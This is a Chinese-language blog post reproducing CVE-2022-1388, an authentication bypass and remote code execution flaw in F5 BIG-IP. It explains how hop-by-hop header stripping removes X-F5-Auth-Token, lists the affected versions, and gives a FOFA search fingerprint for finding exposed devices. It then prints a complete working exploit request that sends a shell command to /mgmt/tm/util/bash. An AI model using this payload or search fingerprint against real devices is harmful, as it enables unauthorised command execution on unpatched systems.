漏洞复现 – CVE-2022-1388 F5 BIG-IP RCE

漏洞原理

hop-by-hop 逐跳,当在请求中遇到这些 header 头,逐跳会进行处理不让其转发至下一跳,比如 Connection: close,abc 在传输过程中,会把 abc 会从原始请求中删除,可以利用此特性进行 SSRF、绕过鉴权等操作,本次漏洞成因就是 Connection: Keep-alive,X-F5-Auth-Token,BIG-IP 的鉴权过程发生在 frontend,在后续转发到 Jetty 时会将此 header 删除,从而绕过鉴权

POST /xxx HTTP/1.1
Host: 
Connection: close,abc
abc:

处理后变成

POST /xxx HTTP/1.1
Host: 
Connection: close

影响版本

- BIG-IP versions 16.1.0 to 16.1.2 (Patch released)
- BIG-IP versions 15.1.0 to 15.1.5 (Patch released)
- BIG-IP versions 14.1.0 to 14.1.4 (Patch released)
- BIG-IP versions 13.1.0 to 13.1.4 (Patch released)
- BIG-IP versions 12.1.0 to 12.1.6 (End of Support)
- BIG-IP versions 11.6.1 to 11.6.5 (End of Support)

fofa 指纹

title=”BIG-IP®- Redirect”

漏洞复现 - CVE-2022-1388 F5 BIG-IP RCE

发送数据包

POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}
漏洞复现 - CVE-2022-1388 F5 BIG-IP RCE
© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容